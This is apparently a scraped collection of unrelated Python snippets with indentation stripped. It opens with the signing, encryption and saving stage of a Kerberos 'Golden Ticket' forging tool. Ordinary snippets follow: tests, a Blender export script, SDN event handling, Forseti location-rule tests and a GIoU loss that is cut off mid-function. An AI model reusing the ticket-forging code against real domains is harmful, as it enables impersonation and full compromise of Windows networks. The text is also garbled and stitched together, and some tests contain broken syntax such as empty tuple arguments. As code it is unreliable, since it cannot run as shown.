pacAttributesInfoAlignment = None
if (PAC_ATTRIBUTES_INFO in pacInfos):
pac_count += 1
pacAttributesInfoBlob = pacInfos[PAC_ATTRIBUTES_INFO]
pacAttributesInfoAlignment = (b'\x00' * self.getPadLength(len(pacAttributesInfoBlob)))
pacRequestorInfoBlob = None
pacRequestorInfoAlignment = None
if (PAC_REQUESTOR_INFO in pacInfos):
pac_count += 1
pacRequestorInfoBlob = pacInfos[PAC_REQUESTOR_INFO]
pacRequestorInfoAlignment = (b'\x00' * self.getPadLength(len(pacRequestorInfoBlob)))
serverChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_SERVER_CHECKSUM])
serverChecksumBlob = pacInfos[PAC_SERVER_CHECKSUM]
serverChecksumAlignment = (b'\x00' * self.getPadLength(len(serverChecksumBlob)))
privSvrChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_PRIVSVR_CHECKSUM])
privSvrChecksumBlob = pacInfos[PAC_PRIVSVR_CHECKSUM]
privSvrChecksumAlignment = (b'\x00' * self.getPadLength(len(privSvrChecksumBlob)))
offsetData = (8 + (len(PAC_INFO_BUFFER().getData()) * pac_count))
validationInfoIB = PAC_INFO_BUFFER()
validationInfoIB['ulType'] = PAC_LOGON_INFO
validationInfoIB['cbBufferSize'] = len(validationInfoBlob)
validationInfoIB['Offset'] = offsetData
offsetData = self.getBlockLength((offsetData + validationInfoIB['cbBufferSize']))
pacClientInfoIB = PAC_INFO_BUFFER()
pacClientInfoIB['ulType'] = PAC_CLIENT_INFO_TYPE
pacClientInfoIB['cbBufferSize'] = len(pacClientInfoBlob)
pacClientInfoIB['Offset'] = offsetData
offsetData = self.getBlockLength((offsetData + pacClientInfoIB['cbBufferSize']))
pacUpnDnsInfoIB = None
if (pacUpnDnsInfoBlob is not None):
pacUpnDnsInfoIB = PAC_INFO_BUFFER()
pacUpnDnsInfoIB['ulType'] = PAC_UPN_DNS_INFO
pacUpnDnsInfoIB['cbBufferSize'] = len(pacUpnDnsInfoBlob)
pacUpnDnsInfoIB['Offset'] = offsetData
offsetData = self.getBlockLength((offsetData + pacUpnDnsInfoIB['cbBufferSize']))
pacAttributesInfoIB = None
if (pacAttributesInfoBlob is not None):
pacAttributesInfoIB = PAC_INFO_BUFFER()
pacAttributesInfoIB['ulType'] = PAC_ATTRIBUTES_INFO
pacAttributesInfoIB['cbBufferSize'] = len(pacAttributesInfoBlob)
pacAttributesInfoIB['Offset'] = offsetData
offsetData = self.getBlockLength((offsetData + pacAttributesInfoIB['cbBufferSize']))
pacRequestorInfoIB = None
if (pacRequestorInfoBlob is not None):
pacRequestorInfoIB = PAC_INFO_BUFFER()
pacRequestorInfoIB['ulType'] = PAC_REQUESTOR_INFO
pacRequestorInfoIB['cbBufferSize'] = len(pacRequestorInfoBlob)
pacRequestorInfoIB['Offset'] = offsetData
offsetData = self.getBlockLength((offsetData + pacRequestorInfoIB['cbBufferSize']))
serverChecksumIB = PAC_INFO_BUFFER()
serverChecksumIB['ulType'] = PAC_SERVER_CHECKSUM
serverChecksumIB['cbBufferSize'] = len(serverChecksumBlob)
serverChecksumIB['Offset'] = offsetData
offsetData = self.getBlockLength((offsetData + serverChecksumIB['cbBufferSize']))
privSvrChecksumIB = PAC_INFO_BUFFER()
privSvrChecksumIB['ulType'] = PAC_PRIVSVR_CHECKSUM
privSvrChecksumIB['cbBufferSize'] = len(privSvrChecksumBlob)
privSvrChecksumIB['Offset'] = offsetData
buffers = (validationInfoIB.getData() + pacClientInfoIB.getData())
if (pacUpnDnsInfoIB is not None):
buffers += pacUpnDnsInfoIB.getData()
if (pacAttributesInfoIB is not None):
buffers += pacAttributesInfoIB.getData()
if (pacRequestorInfoIB is not None):
buffers += pacRequestorInfoIB.getData()
buffers += (((((serverChecksumIB.getData() + privSvrChecksumIB.getData()) + validationInfoBlob) + validationInfoAlignment) + pacInfos[PAC_CLIENT_INFO_TYPE]) + pacClientInfoAlignment)
if (pacUpnDnsInfoIB is not None):
buffers += (pacUpnDnsInfoBlob + pacUpnDnsInfoAlignment)
if (pacAttributesInfoIB is not None):
buffers += (pacAttributesInfoBlob + pacAttributesInfoAlignment)
if (pacRequestorInfoIB is not None):
buffers += (pacRequestorInfoBlob + pacRequestorInfoAlignment)
buffersTail = (((serverChecksumBlob + serverChecksumAlignment) + privSvrChecksum.getData()) + privSvrChecksumAlignment)
pacType = PACTYPE()
pacType['cBuffers'] = pac_count
pacType['Version'] = 0
pacType['Buffers'] = (buffers + buffersTail)
blobToChecksum = pacType.getData()
checkSumFunctionServer = _checksum_table[serverChecksum['SignatureType']]
if (serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value):
keyServer = Key(Enctype.AES256, unhexlify(self.__options.aesKey))
elif (serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value):
keyServer = Key(Enctype.AES128, unhexlify(self.__options.aesKey))
elif (serverChecksum['SignatureType'] == ChecksumTypes.hmac_md5.value):
keyServer = Key(Enctype.RC4, unhexlify(self.__options.nthash))
else:
raise Exception(('Invalid Server checksum type 0x%x' % serverChecksum['SignatureType']))
checkSumFunctionPriv = _checksum_table[privSvrChecksum['SignatureType']]
if (privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value):
keyPriv = Key(Enctype.AES256, unhexlify(self.__options.aesKey))
elif (privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value):
keyPriv = Key(Enctype.AES128, unhexlify(self.__options.aesKey))
elif (privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_md5.value):
keyPriv = Key(Enctype.RC4, unhexlify(self.__options.nthash))
else:
raise Exception(('Invalid Priv checksum type 0x%x' % serverChecksum['SignatureType']))
serverChecksum['Signature'] = checkSumFunctionServer.checksum(keyServer, KERB_NON_KERB_CKSUM_SALT, blobToChecksum)
logging.info('\tPAC_SERVER_CHECKSUM')
privSvrChecksum['Signature'] = checkSumFunctionPriv.checksum(keyPriv, KERB_NON_KERB_CKSUM_SALT, serverChecksum['Signature'])
logging.info('\tPAC_PRIVSVR_CHECKSUM')
buffersTail = (((serverChecksum.getData() + serverChecksumAlignment) + privSvrChecksum.getData()) + privSvrChecksumAlignment)
pacType['Buffers'] = (buffers + buffersTail)
authorizationData = AuthorizationData()
authorizationData[0] = noValue
authorizationData[0]['ad-type'] = AuthorizationDataType.AD_WIN2K_PAC.value
authorizationData[0]['ad-data'] = pacType.getData()
authorizationData = encoder.encode(authorizationData)
encTicketPart['authorization-data'][0]['ad-data'] = authorizationData
if (logging.getLogger().level == logging.DEBUG):
logging.debug('Customized EncTicketPart')
print(encTicketPart.prettyPrint())
print('\n')
encodedEncTicketPart = encoder.encode(encTicketPart)
cipher = _enctype_table[kdcRep['ticket']['enc-part']['etype']]
if (cipher.enctype == EncryptionTypes.aes256_cts_hmac_sha1_96.value):
key = Key(cipher.enctype, unhexlify(self.__options.aesKey))
elif (cipher.enctype == EncryptionTypes.aes128_cts_hmac_sha1_96.value):
key = Key(cipher.enctype, unhexlify(self.__options.aesKey))
elif (cipher.enctype == EncryptionTypes.rc4_hmac.value):
key = Key(cipher.enctype, unhexlify(self.__options.nthash))
else:
raise Exception(('Unsupported enctype 0x%x' % cipher.enctype))
logging.info('\tEncTicketPart')
cipherText = cipher.encrypt(key, 2, encodedEncTicketPart, None)
kdcRep['ticket']['enc-part']['cipher'] = cipherText
kdcRep['ticket']['enc-part']['kvno'] = 2
encodedEncASRepPart = encoder.encode(encASorTGSRepPart)
if (self.__domain == self.__server):
sessionKey = Key(cipher.enctype, encASorTGSRepPart['key']['keyvalue'].asOctets())
logging.info('\tEncASRepPart')
cipherText = cipher.encrypt(sessionKey, 3, encodedEncASRepPart, None)
else:
sessionKey = Key(cipher.enctype, encASorTGSRepPart['key']['keyvalue'].asOctets())
logging.info('\tEncTGSRepPart')
cipherText = cipher.encrypt(sessionKey, 8, encodedEncASRepPart, None)
kdcRep['enc-part']['cipher'] = cipherText
kdcRep['enc-part']['etype'] = cipher.enctype
kdcRep['enc-part']['kvno'] = 1
if (logging.getLogger().level == logging.DEBUG):
logging.debug('Final Golden Ticket')
print(kdcRep.prettyPrint())
print('\n')
return (encoder.encode(kdcRep), cipher, sessionKey)
def saveTicket(self, ticket, sessionKey):
logging.info(('Saving ticket in %s' % (self.__target.replace('/', '.') + '.ccache')))
from impacket.krb5.ccache import CCache
ccache = CCache()
if (self.__server == self.__domain):
ccache.fromTGT(ticket, sessionKey, sessionKey)
else:
ccache.fromTGS(ticket, sessionKey, sessionKey)
ccache.saveFile((self.__target.replace('/', '.') + '.ccache'))
def run(self):
(ticket, adIfRelevant) = self.createBasicTicket()
if (ticket is not None):
(encASorTGSRepPart, encTicketPart, pacInfos) = self.customizeTicket(ticket, adIfRelevant)
(ticket, cipher, sessionKey) = self.signEncryptTicket(ticket, encASorTGSRepPart, encTicketPart, pacInfos)
self.saveTicket(ticket, sessionKey) |
class Joystick(BaseJoystick):
def __init__(self, disptype=settings.DISPTYPE, **args):
if (disptype in ('pygame', 'psychopy')):
from pygaze._joystick.pygamejoystick import PyGameJoystick
self.__class__ = PyGameJoystick
else:
raise Exception('Unexpected disptype: {}'.format(disptype))
self.__class__.__init__(self, **args)
copy_docstr(BaseJoystick, Joystick) |
class TestMatchIP(TestCase):
def test_match_ip(self):
self.assertFalse(utils.match_ip('192.168.0.1', '10.0.0.0/24'))
self.assertTrue(utils.match_ip('192.168.0.1', '192.168.0.0/24'))
self.assertTrue(utils.match_ip('192.168.0.1', '192.168.0.1'))
self.assertFalse(utils.match_ip('192.168.0.1', '10.0.0.1')) |
class DEP002UnusedDependenciesFinder(ViolationsFinder):
def find(self) -> list[Violation]:
logging.debug('\nScanning for unused dependencies...')
unused_dependencies: list[Violation] = []
for dependency in self.dependencies:
logging.debug('Scanning module %s...', dependency.name)
if self._is_unused(dependency):
unused_dependencies.append(DEP002UnusedDependencyViolation(dependency, Location(dependency.definition_file)))
return unused_dependencies
def _is_unused(self, dependency: Dependency) -> bool:
if (self._dependency_found_in_imported_modules(dependency) or self._any_of_the_top_levels_imported(dependency)):
return False
if (dependency.name in self.ignored_modules):
logging.debug("Dependency '%s' found to be unused, but ignoring.", dependency.name)
return False
logging.debug("Dependency '%s' does not seem to be used.", dependency.name)
return True
def _dependency_found_in_imported_modules(self, dependency: Dependency) -> bool:
return any(((module_with_locations.module.package == dependency.name) for module_with_locations in self.imported_modules_with_locations))
def _any_of_the_top_levels_imported(self, dependency: Dependency) -> bool:
if (not dependency.top_levels):
return False
return any((any(((module_with_locations.module.name == top_level) for module_with_locations in self.imported_modules_with_locations)) for top_level in dependency.top_levels)) |
class Solution(object):
def longestPalindrome(self, s):
tr = {}
for c in s:
if (c not in tr):
tr[c] = 0
tr[c] += 1
odd_max = (- 1)
r = 0
for (c, n) in tr.items():
if ((n % 2) == 0):
r += n
else:
r += (n - 1)
odd_max = max(odd_max, n)
if (odd_max > 0):
r += 1
return r |
class DummyPointGlyph(DummyGlyph):
DrawingPen = DummyPointPen
def appendGlyph(self, glyph):
glyph.drawPoints(self._pen)
def getPen(self):
return SegmentToPointPen(self._pen)
def getPointPen(self):
return self._pen
def draw(self, pen):
pointPen = PointToSegmentPen(pen)
self.drawPoints(pointPen)
def drawPoints(self, pointPen):
if self.outline:
for (cmd, args, kwargs) in self.outline:
getattr(pointPen, cmd)(*args, **kwargs) |
def extractVertexGroup(from_path, to_path, hier_path):
to_dir = '/'.join(to_path.split('/')[:(- 1)])
res_dir = '/'.join(hier_path.split('/')[:(- 1)])
if (not os.path.exists(to_dir)):
os.makedirs(to_dir)
if (not os.path.exists(res_dir)):
os.makedirs(res_dir)
objs = bpy.data.objects
objs.remove(objs['Cube'], do_unlink=True)
objs.remove(objs['Camera'], do_unlink=True)
objs.remove(objs['Light'], do_unlink=True)
bpy.ops.import_scene.fbx(filepath=from_path)
print(bpy.data.armatures.keys())
real_armature = bpy.data.armatures['SMPLX-female']
print(real_armature.bones.keys())
with open(hier_path, 'w') as f:
for key in real_armature.bones.keys():
if (real_armature.bones[key].parent is None):
f.write((key + ' None 0\n'))
elif (real_armature.bones[key].parent.name.find('root') != (- 1)):
f.write((((key + ' ') + real_armature.bones[key].parent.name) + ' 0\n'))
else:
f.write((((key + ' ') + real_armature.bones[key].parent.name) + ' 1\n'))
bpy.ops.export_scene.obj(filepath=to_path, keep_vertex_order=True, use_vertex_groups=True) |
class CopyTraits(object):
def test_baz2_s(self):
self.assertEqual(self.baz2.s, 'baz')
self.assertEqual(self.baz2.s, self.baz.s)
def test_baz2_bar_s(self):
self.assertEqual(self.baz2.bar.s, 'bar')
self.assertEqual(self.baz2.bar.s, self.baz.bar.s)
def test_baz2_bar_foo_s(self):
self.assertEqual(self.baz2.bar.foo.s, 'foo')
self.assertEqual(self.baz2.bar.foo.s, self.baz.bar.foo.s)
def test_baz2_shared_s(self):
self.assertEqual(self.baz2.shared.s, 'shared')
self.assertEqual(self.baz2.bar.shared.s, 'shared')
self.assertEqual(self.baz2.bar.foo.shared.s, 'shared')
def test_baz2_bar(self):
self.assertIsNot(self.baz2.bar, None)
self.assertIsNot(self.baz2.bar, self.bar2)
self.assertIsNot(self.baz2.bar, self.baz.bar)
def test_baz2_bar_foo(self):
self.assertIsNot(self.baz2.bar.foo, None)
self.assertIsNot(self.baz2.bar.foo, self.foo2)
self.assertIsNot(self.baz2.bar.foo, self.baz.bar.foo) |
def test_pandas_annotations():
data = dict(a=['foo', 'bar'], b=[1, 2])
df1 = pd.DataFrame(data, columns=['a', 'b'])
obj1 = Owner()
assert (annotate(df1, obj1, foo=42) is df1)
assert ('climetlab-0' in df1._metadata)
a1 = annotation(df1)
assert (a1.get('foo') == 42)
assert (a1.owner is obj1)
df2 = df1[(df1.b == 42)]
a2 = annotation(df2)
assert (a2.get('foo') == 42)
assert (a2.owner is obj1)
assert (a1 is a2)
del obj1
assert (a2.owner is None)
obj3 = Owner
df3 = pd.DataFrame(data, columns=['a', 'b'])
annotate(df3, obj3, bar=42)
a3 = annotation(df3)
assert (a1 is not a3)
assert ('climetlab-0' in df3._metadata) |
def update_treasury_appropriation_account_agencies():
sql = f'''
with
ata_mapping as (
select
taa.treasury_account_identifier,
ata.toptier_agency_id as awarding_toptier_agency_id
from
treasury_appropriation_account as taa
left outer join toptier_agency as ata on
ata.toptier_code = case
when taa.allocation_transfer_agency_id in {DOD_SUBSUMED_AIDS} then '{DOD_AID}'
else taa.allocation_transfer_agency_id
end
),
aid_mapping as (
{FEDERAL_ACCOUNT_PARENT_AGENCY_MAPPING}
)
update
treasury_appropriation_account as taa
set
awarding_toptier_agency_id = ata_mapping.awarding_toptier_agency_id,
funding_toptier_agency_id = aid_mapping.parent_toptier_agency_id
from
ata_mapping,
aid_mapping
where
ata_mapping.treasury_account_identifier = taa.treasury_account_identifier and
aid_mapping.agency_identifier = taa.agency_id and
aid_mapping.main_account_code = taa.main_account_code and (
ata_mapping.awarding_toptier_agency_id is distinct from taa.awarding_toptier_agency_id or
aid_mapping.parent_toptier_agency_id is distinct from taa.funding_toptier_agency_id
)
'''
return execute_dml_sql(sql) |
def test_types():
assert (TypeTransformer(None, type=EnumType(enum)).transform('a') == 'a')
assert (TypeTransformer(None, type=EnumListType(enum)).transform('a') == ['a'])
assert (TypeTransformer(None, type=StrType).transform(42) == '42')
assert (TypeTransformer(None, type=StrListType).transform(42) == ['42'])
assert (TypeTransformer(None, type=IntType).transform('42') == 42)
assert (TypeTransformer(None, type=IntListType).transform('42') == [42])
assert (TypeTransformer(None, type=IntListType).transform('42/to/44') == [42, 43, 44])
assert (TypeTransformer(None, type=IntListType).transform('42/to/48/by/3') == [42, 45, 48])
assert (TypeTransformer(None, type=FloatType).transform('3.14') == 3.14)
assert (TypeTransformer(None, type=FloatListType).transform(3.14) == [3.14])
assert (TypeTransformer(None, type=DateType).transform() == datetime.datetime(2000, 1, 1))
assert (TypeTransformer(None, type=DateListType).transform('/to/') == [datetime.datetime(2000, 1, 1), datetime.datetime(2000, 1, 2), datetime.datetime(2000, 1, 3)])
assert (TypeTransformer(None, type=DateListType).transform((, , )) == [datetime.datetime(2000, 1, 1), datetime.datetime(2000, 1, 2), datetime.datetime(2000, 1, 3)])
with pytest.raises(AssertionError):
assert (TypeTransformer(None, type=VariableType('cf')).transform(42) == 0)
with pytest.raises(AssertionError):
assert (TypeTransformer(None, type=VariableListType('cf')).transform(42) == 0)
assert (TypeTransformer(None, type=BoundingBoxType).transform((1, (- 1), (- 1), 1)) == BoundingBox(north=1, west=(- 1), south=(- 1), east=1)) |
def extractSnailtranslationWordpressCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
if (item['tags'] == ['Tak Berkategori']):
titlemap = [('Its Sudden, but I came to Another World! But I hope to live Safely', "It's Sudden, but I came to Another World! But I hope to live Safely", 'translated'), ('Tensei Shoujo no Rirekisho', 'Tensei Shoujo no Rirekisho', 'translated'), ('Master of Dungeon', 'Master of Dungeon', 'oel')]
for (titlecomponent, name, tl_type) in titlemap:
if (titlecomponent.lower() in item['title'].lower()):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
class SDNEvents():
def __init__(self, logger, prom, sdnc):
self.logger = logger
self.prom = prom
self.m_queue = queue.Queue()
self.job_queue = queue.Queue()
self.rabbits = []
self.config = Config().get_config()
self.sdnc = sdnc
self.sdnc.default_endpoints()
self.prom.update_endpoint_metadata(self.sdnc.endpoints)
def create_message_queue(self, host, port, exchange, binding_key):
waiting = True
while waiting:
rabbit = Rabbit()
rabbit.make_rabbit_connection(host, port, exchange, binding_key)
rabbit.start_channel(self.rabbit_callback, self.m_queue)
waiting = False
self.rabbits.append(rabbit)
def start_message_queues(self):
host = self.config['FA_RABBIT_HOST']
port = int(self.config['FA_RABBIT_PORT'])
exchange = 'topic-poseidon-internal'
binding_key = ['poseidon.algos.#', 'poseidon.action.#']
self.create_message_queue(host, port, exchange, binding_key)
exchange = self.config['FA_RABBIT_EXCHANGE']
binding_key = [(self.config['FA_RABBIT_ROUTING_KEY'] + '.#')]
self.create_message_queue(host, port, exchange, binding_key)
def merge_metadata(self, new_metadata):
updated = set()
metadata_types = {'mac_addresses': self.sdnc.endpoints_by_mac, 'ipv4_addresses': self.sdnc.endpoints_by_ip, 'ipv6_addresses': self.sdnc.endpoints_by_ip}
for (metadata_type, metadata_lookup) in metadata_types.items():
type_new_metadata = new_metadata.get(metadata_type, {})
for (key, data) in type_new_metadata.items():
endpoints = metadata_lookup(key)
if endpoints:
endpoint = endpoints[0]
if (metadata_type not in endpoint.metadata):
endpoint.metadata[metadata_type] = defaultdict(dict)
if (key in endpoint.metadata[metadata_type]):
endpoint.metadata[metadata_type][key].update(data)
else:
endpoint.metadata[metadata_type][key] = data
updated.add(endpoint)
return updated
def format_rabbit_message(self, item, faucet_event, remove_list):
(routing_key, my_obj) = item
self.logger.debug('routing_key: {0} rabbit_message: {1}'.format(routing_key, my_obj))
def handler_algos_decider(my_obj):
self.logger.debug('decider value:{0}'.format(my_obj))
tool = my_obj.get('tool', 'unknown')
self.update_prom_var_time('last_tool_result_time', 'tool', tool)
data = my_obj.get('data', None)
if (isinstance(data, dict) and data):
updated = self.merge_metadata(data)
if updated:
for endpoint in updated:
if endpoint.operation_active():
self.sdnc.unmirror_endpoint(endpoint)
return data
return {}
def handler_action_ignore(my_obj):
for name in my_obj:
endpoint = self.sdnc.endpoints.get(name, None)
if endpoint:
endpoint.ignore = True
return {}
def handler_action_clear_ignored(my_obj):
for name in my_obj:
endpoint = self.sdnc.endpoints.get(name, None)
if endpoint:
endpoint.ignore = False
return {}
def handler_action_change(my_obj):
for (name, state) in my_obj:
endpoint = self.sdnc.endpoints.get(name, None)
if endpoint:
try:
if endpoint.operation_active():
self.sdnc.unmirror_endpoint(endpoint)
endpoint.machine_trigger(state)
endpoint.p_next_state = None
if endpoint.operation_active():
self.sdnc.mirror_endpoint(endpoint)
self.prom.prom_metrics['ncapture_count'].inc()
except Exception as e:
self.logger.error('Unable to change endpoint {0} because: {1}'.format(endpoint.name, str(e)))
return {}
def handler_action_update_acls(my_obj):
for ip in my_obj:
rules = my_obj[ip]
endpoints = self.sdnc.endpoints_by_ip(ip)
if endpoints:
endpoint = endpoints[0]
try:
status = Actions(endpoint, self.sdnc.sdnc).update_acls(rules_file=self.config['RULES_FILE'], endpoints=endpoints, force_apply_rules=rules)
if (not status):
self.logger.warning('Unable to apply rules: {0} to endpoint: {1}'.format(rules, endpoint.name))
except Exception as e:
self.logger.error('Unable to apply rules: {0} to endpoint: {1} because {2}'.format(rules, endpoint.name, str(e)))
return {}
def handler_action_remove(my_obj):
remove_list.extend([name for name in my_obj])
return {}
def handler_action_remove_ignored(_my_obj):
remove_list.extend([endpoint.name for endpoint in self.sdnc.endpoints.values() if endpoint.ignore])
return {}
def handler_faucet_event(my_obj):
if (self.sdnc and self.sdnc.sdnc):
faucet_event.append(my_obj)
return my_obj
return {}
handlers = {'poseidon.algos.decider': handler_algos_decider, 'poseidon.action.ignore': handler_action_ignore, 'poseidon.action.clear.ignored': handler_action_clear_ignored, 'poseidon.action.change': handler_action_change, 'poseidon.action.update_acls': handler_action_update_acls, 'poseidon.action.remove': handler_action_remove, 'poseidon.action.remove.ignored': handler_action_remove_ignored, self.config['FA_RABBIT_ROUTING_KEY']: handler_faucet_event}
handler = handlers.get(routing_key, None)
if (handler is not None):
ret_val = handler(my_obj)
return (ret_val, True)
self.logger.error('no handler for routing_key {0}'.format(routing_key))
return ({}, False)
def update_prom_var_time(self, var, label_name, label_value):
if self.prom:
self.prom.prom_metrics[var].labels(**{label_name: label_value}).set(time.time())
def handle_rabbit(self):
events = 0
faucet_event = []
remove_list = []
while True:
(found_work, rabbit_msg) = self.prom.runtime_callable(partial(self.get_q_item, self.m_queue))
if (not found_work):
break
events += 1
self.prom.runtime_callable(partial(self.format_rabbit_message, rabbit_msg, faucet_event, remove_list))
return (events, faucet_event, remove_list)
def ignore_rabbit(self, routing_key, body):
if (routing_key == self.config['FA_RABBIT_ROUTING_KEY']):
if (self.sdnc and self.sdnc.sdnc):
if self.sdnc.sdnc.ignore_event(body):
return True
return False
def rabbit_callback(self, ch, method, _properties, body, q=None):
body = json.loads(body)
self.logger.debug('got a message: {0}:{1} (qsize {2})'.format(method.routing_key, body, q.qsize()))
if (q is not None):
self.update_prom_var_time('last_rabbitmq_routing_key_time', 'routing_key', method.routing_key)
if (not self.ignore_rabbit(method.routing_key, body)):
q.put((method.routing_key, body))
ch.basic_ack(delivery_tag=method.delivery_tag)
def process(self, monitor):
while True:
(events, faucet_event, remove_list) = self.prom.runtime_callable(self.handle_rabbit)
if remove_list:
for endpoint_name in remove_list:
if (endpoint_name in self.sdnc.endpoints):
del self.sdnc.endpoints[endpoint_name]
if faucet_event:
self.prom.runtime_callable(partial(self.sdnc.check_endpoints, faucet_event))
events += self.prom.runtime_callable(monitor.schedule_mirroring)
(found_work, schedule_func) = self.prom.runtime_callable(partial(self.get_q_item, self.job_queue))
if (found_work and callable(schedule_func)):
events += self.prom.runtime_callable(schedule_func)
if events:
self.prom.update_endpoint_metadata(self.sdnc.endpoints)
time.sleep(1)
def get_q_item(q):
try:
item = q.get_nowait()
q.task_done()
return (True, item)
except queue.Empty:
pass
return (False, None) |
class OptionPlotoptionsArcdiagramSonificationDefaultinstrumentoptionsMappingLowpassFrequency(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class LocationRulesEngineTest(ForsetiTestCase):
def setUp(self):
location_rules_engine.LOGGER = mock.MagicMock()
def test_build_rule_book_from_local_yaml_file(self):
rule = rule_tmpl.format(mode='whitelist', type='bucket', ids=['*'], locations=['eu*'])
rules_engine = get_rules_engine_with_rule(rule)
self.assertEqual(1, len(rules_engine.rule_book.resource_to_rules))
def test_find_violations_bucket_whitelist_no_violations(self):
rule = rule_tmpl.format(mode='whitelist', type='bucket', ids=['*'], locations=['eu*'])
rules_engine = get_rules_engine_with_rule(rule)
got_violations = list(rules_engine.find_violations(data.BUCKET))
self.assertEqual(got_violations, [])
def test_find_violations_bucket_whitelist_has_violations(self):
rule = rule_tmpl.format(mode='whitelist', type='bucket', ids=['*'], locations=['us*'])
rules_engine = get_rules_engine_with_rule(rule)
got_violations = list(rules_engine.find_violations(data.BUCKET))
self.assertEqual(got_violations, data.build_violations(data.BUCKET))
def test_find_violations_bucket_blacklist_no_violations(self):
rule = rule_tmpl.format(mode='blacklist', type='bucket', ids=['*'], locations=['us*'])
rules_engine = get_rules_engine_with_rule(rule)
got_violations = list(rules_engine.find_violations(data.BUCKET))
self.assertEqual(got_violations, [])
def test_find_violations_bucket_blacklist_has_violations(self):
rule = rule_tmpl.format(mode='blacklist', type='bucket', ids=['*'], locations=['eu*'])
rules_engine = get_rules_engine_with_rule(rule)
got_violations = list(rules_engine.find_violations(data.BUCKET))
self.assertEqual(got_violations, data.build_violations(data.BUCKET))
def test_find_violations_dataset(self):
rule = rule_tmpl.format(mode='blacklist', type='dataset', ids=['*'], locations=['eu*'])
rules_engine = get_rules_engine_with_rule(rule)
got_violations = list(rules_engine.find_violations(data.DATASET))
self.assertEqual(got_violations, data.build_violations(data.DATASET))
def test_find_violations_cloud_sql_instance(self):
rule = rule_tmpl.format(mode='blacklist', type='cloudsqlinstance', ids=['*'], locations=['eu*'])
rules_engine = get_rules_engine_with_rule(rule)
got_violations = list(rules_engine.find_violations(data.CLOUD_SQL_INSTANCE))
self.assertEqual(got_violations, data.build_violations(data.CLOUD_SQL_INSTANCE))
def test_find_violations_cluster(self):
rule = rule_tmpl.format(mode='blacklist', type='kubernetes_cluster', ids=['*'], locations=['eu*'])
rules_engine = get_rules_engine_with_rule(rule)
got_violations = list(rules_engine.find_violations(data.CLUSTER))
self.assertEqual(got_violations, data.build_violations(data.CLUSTER))
def test_find_violations_gce_instance(self):
rule = rule_tmpl.format(mode='blacklist', type='instance', ids=['*'], locations=['eu*'])
rules_engine = get_rules_engine_with_rule(rule)
got_violations = list(rules_engine.find_violations(data.GCE_INSTANCE))
self.assertEqual(got_violations, data.build_violations(data.GCE_INSTANCE))
def test_find_violations_exact(self):
rule = rule_tmpl.format(mode='blacklist', type='bucket', ids=['*'], locations=['europe-west1'])
rules_engine = get_rules_engine_with_rule(rule)
got_violations = list(rules_engine.find_violations(data.BUCKET))
self.assertEqual(got_violations, data.build_violations(data.BUCKET))
def test_find_violations_multiple_locations(self):
rule = rule_tmpl.format(mode='blacklist', type='bucket', ids=['*'], locations=['us*', 'eu*'])
rules_engine = get_rules_engine_with_rule(rule)
got_violations = list(rules_engine.find_violations(data.BUCKET))
self.assertEqual(got_violations, data.build_violations(data.BUCKET))
def test_find_violations_specific_id(self):
rule = rule_tmpl.format(mode='blacklist', type='bucket', ids=['dne', 'p1-bucket1'], locations=['eu*'])
rules_engine = get_rules_engine_with_rule(rule)
got_violations = list(rules_engine.find_violations(data.BUCKET))
self.assertEqual(got_violations, data.build_violations(data.BUCKET))
def test_find_violations_applies_all_resources(self):
rule = rule_tmpl.format(mode='blacklist', type='*', ids=['*'], locations=['eu*'])
rules_engine = get_rules_engine_with_rule(rule)
got_violations = list(rules_engine.find_violations(data.BUCKET))
self.assertEqual(got_violations, data.build_violations(data.BUCKET))
def test_find_violations_backwards_compatibility(self):
rule = "\nrules:\n - name: Location test rule\n mode: blacklist\n resource:\n - type: 'organization'\n resource_ids: ['234']\n applies_to: ['bucket']\n locations: ['eu*']\n"
rules_engine = get_rules_engine_with_rule(rule)
got_violations = list(rules_engine.find_violations(data.BUCKET))
self.assertEqual(got_violations, data.build_violations(data.BUCKET))
def test_find_violations_project(self):
rule = "\nrules:\n - name: Location test rule\n mode: blacklist\n resource:\n - type: 'project'\n resource_ids: ['p1']\n applies_to: ['bucket']\n locations: ['eu*']\n"
rules_engine = get_rules_engine_with_rule(rule)
got_violations = list(rules_engine.find_violations(data.BUCKET))
self.assertEqual(got_violations, data.build_violations(data.BUCKET)) |
def giou_loss(boxes1: torch.Tensor, boxes2: torch.Tensor, reduction: str='none', eps: float=1e-07) -> torch.Tensor:
(x1, y1, x2, y2) = boxes1.unbind(dim=(- 1))
(x1g, y1g, x2g, y2g) = boxes2.unbind(dim=(- 1))
assert (x2 >= x1).all(), 'bad box: x1 larger than x2'
assert (y2 >= y1).all(), 'bad box: y1 larger than y2'
xkis1 = torch.max(x1, x1g)
ykis1 = torch.max(y1, y1g)
xkis2 = torch.min(x2, x2g)
ykis2 = torch.min(y2, y2g)
intsctk = torch.zeros_like(x1)
mask = ((ykis2 > ykis1) & (xkis2 > xkis1))
intsctk[mask] = ((xkis2[mask] - xkis1[mask]) * (ykis2[mask] - ykis1[mask]))
unionk = ((((x2 - x1) * (y2 - y1)) + ((x2g - x1g) * (y2g - y1g))) - intsctk)
iouk = (intsctk / (unionk + eps))
xc1 = torch.min(x1, x1g)
yc1 = torch.min(y1, y1g)
xc2 = torch.max(x2, x2g)
